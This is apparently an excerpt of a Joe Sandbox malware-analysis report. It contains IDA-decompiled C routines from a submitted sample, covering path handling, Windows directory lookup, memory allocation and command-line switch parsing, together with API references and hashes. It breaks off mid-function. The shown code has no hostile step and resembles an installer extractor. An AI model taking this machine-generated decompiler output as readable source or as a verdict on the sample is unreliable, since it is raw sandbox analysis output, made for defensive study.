                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xc8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xc8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E000C16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x000c6592
                                                                                                                                                                                                        0x000c6594
                                                                                                                                                                                                        0x000c6596
                                                                                                                                                                                                        0x000c6598
                                                                                                                                                                                                        0x000c6598
                                                                                                                                                                                                        0x000c659b
                                                                                                                                                                                                        0x000c659b
                                                                                                                                                                                                        0x000c659d
                                                                                                                                                                                                        0x000c659e
                                                                                                                                                                                                        0x000c65a2
                                                                                                                                                                                                        0x000c65a4
                                                                                                                                                                                                        0x000c65a9
                                                                                                                                                                                                        0x000c65b2
                                                                                                                                                                                                        0x000c65b6
                                                                                                                                                                                                        0x000c65ba
                                                                                                                                                                                                        0x000c65c3
                                                                                                                                                                                                        0x000c65c5
                                                                                                                                                                                                        0x000c65c8
                                                                                                                                                                                                        0x000c65c8
                                                                                                                                                                                                        0x000c65c3
                                                                                                                                                                                                        0x000c65c9
                                                                                                                                                                                                        0x000c65cc
                                                                                                                                                                                                        0x000c65d2
                                                                                                                                                                                                        0x000c65d1
                                                                                                                                                                                                        0x000c65d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c65dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(000C8B3E,000C8B3F,00000001,000C8B3E,-00000003,?,000C60EC,000C1140,?), ref: 000C65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: c1aa8a567f0634248e99cd81dca981d4e8803d428c9e698f2e636e12b3db8e35
                                                                                                                                                                                                        • Instruction ID: 8307c04528ff0fecc6f3523422abc27e73d27e3deb91f1220afdbba7445599d4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1aa8a567f0634248e99cd81dca981d4e8803d428c9e698f2e636e12b3db8e35
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F042725086509BD331071D9884FAEBFDD9BC6350F38015EE8DAC3205CA574C4583A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E000C597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x000c6229
                                                                                                                                                                                                        0x000c6230
                                                                                                                                                                                                        0x000c6247
                                                                                                                                                                                                        0x000c626a
                                                                                                                                                                                                        0x000c6272
                                                                                                                                                                                                        0x000c6249
                                                                                                                                                                                                        0x000c6255
                                                                                                                                                                                                        0x000c625f
                                                                                                                                                                                                        0x000c6264
                                                                                                                                                                                                        0x000c6264
                                                                                                                                                                                                        0x000c6284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000C623F
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 2534683a917cfcf9f5d875fc547a451a1d4b3fb8f373a1fe4b70450eb876307e
                                                                                                                                                                                                        • Instruction ID: ae6dc80351f21190495afd7b61ba0f7a5502b39152ad582f12763a51d739ba85
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2534683a917cfcf9f5d875fc547a451a1d4b3fb8f373a1fe4b70450eb876307e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2F0BEB0700208ABE7A0EB748D06FFE32A8DB48300F50006EB986D6092EE7999848650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xc8d64)) != 1) {
                                                                                                                                                                                                        					_t7 = _t15 + 0xc8d74; // 0x7ec07c1f, executed
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *_t7); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xc8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x000c4b66
                                                                                                                                                                                                        0x000c4b74
                                                                                                                                                                                                        0x000c4b92
                                                                                                                                                                                                        0x000c4b98
                                                                                                                                                                                                        0x000c4ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4bac
                                                                                                                                                                                                        0x000c4ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4ba4
                                                                                                                                                                                                        0x000c4b78
                                                                                                                                                                                                        0x000c4b7e
                                                                                                                                                                                                        0x000c4b84
                                                                                                                                                                                                        0x000c4b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(7EC07C1F,00000000,00000000,?,000C4FA1,00000000), ref: 000C4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 877934b4fd6dd34ec957d7aaaa87bcf52267a0a38397c92dc202c14f1635e6e4
                                                                                                                                                                                                        • Instruction ID: 2a7d87a4bcd68bed591e717e5470a5324d4392012788493a343464e262b15e94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 877934b4fd6dd34ec957d7aaaa87bcf52267a0a38397c92dc202c14f1635e6e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADF01271D00B089E47718F39DC00F97BBE4BBA63613148D2EA46FD21D0EB30A841DB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x000c66b1
                                                                                                                                                                                                        0x000c66ba
                                                                                                                                                                                                        0x000c66c7
                                                                                                                                                                                                        0x000c66bc
                                                                                                                                                                                                        0x000c66be
                                                                                                                                                                                                        0x000c66be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,000C4777,?,000C4E38,?), ref: 000C66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 1615770e8f1ce21f96e678db8cf9e0a25ebcb1650029e0ce506c02355ff4c79a
                                                                                                                                                                                                        • Instruction ID: eaa91b99d9047f7d72ce49cdbb92d0b9c1325ec7c7aac63ed5bca26608ef92da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1615770e8f1ce21f96e678db8cf9e0a25ebcb1650029e0ce506c02355ff4c79a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7B09276222444436A6007316C29A5A3881A7C233A7E41B94F032C01E0CA3ED846E004
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x000c4caa
                                                                                                                                                                                                        0x000c4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 000C4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: d084ec1d1584168ffd37915e998c489c8056299eb12387d28b164fc6e5b2ab72
                                                                                                                                                                                                        • Instruction ID: f09539b32245a60dcb6264e97a9c6432aad04a80366e062f8b9e47249f0a5a6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d084ec1d1584168ffd37915e998c489c8056299eb12387d28b164fc6e5b2ab72
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14B0123214420CB7DF001FC2EC09F853F1DE7C57A5F240000F60C450908A7694108696
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x000c4cc8
                                                                                                                                                                                                        0x000c4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: f9c9e116e4bf5991db491211ef77fec746b64c1d893324473af46923c6dd8d34
                                                                                                                                                                                                        • Instruction ID: a87394104dd43eef35e7b249fa4fe84a352b3a817151210d15b329ebead0e68e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9c9e116e4bf5991db491211ef77fec746b64c1d893324473af46923c6dd8d34
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EB0123100010CB78F001B42EC08C453F1DD7C13A47100010F50C410218B3B98118585
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E000C5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											if(_v272[1] == 0x22) {
                                                                                                                                                                                                        												if(_t202 >= 0x104) {
                                                                                                                                                                                                        													L106:
                                                                                                                                                                                                        													_t63 = 0;
                                                                                                                                                                                                        													L125:
                                                                                                                                                                                                        													_pop(_t210);
                                                                                                                                                                                                        													_pop(_t212);
                                                                                                                                                                                                        													_pop(_t162);
                                                                                                                                                                                                        													return E000C6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                        													_t177 = _t177 + 1;
                                                                                                                                                                                                        													_t202 = _t202 + 1;
                                                                                                                                                                                                        													_t157 = 2;
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												if(_t213 != 0) {
                                                                                                                                                                                                        													_t163 = 1;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t213 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L131;
                                                                                                                                                                                                        								L30:
                                                                                                                                                                                                        								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                        								_t69 = _v272;
                                                                                                                                                                                                        							} while ( *_t69 != 0);
                                                                                                                                                                                                        							if(_t177 >= 0x104) {
                                                                                                                                                                                                        								E000C6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                        								asm("int3");
                                                                                                                                                                                                        								_push(_t221);
                                                                                                                                                                                                        								_t222 = _t223;
                                                                                                                                                                                                        								_t71 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                        									0x4f0 = 2;
                                                                                                                                                                                                        									_t75 = E000C597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E000C44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                        									 *0xc9124 = E000C6285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E000C6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E000C44B9(0, 0x521, 0xc1140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0xc8588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
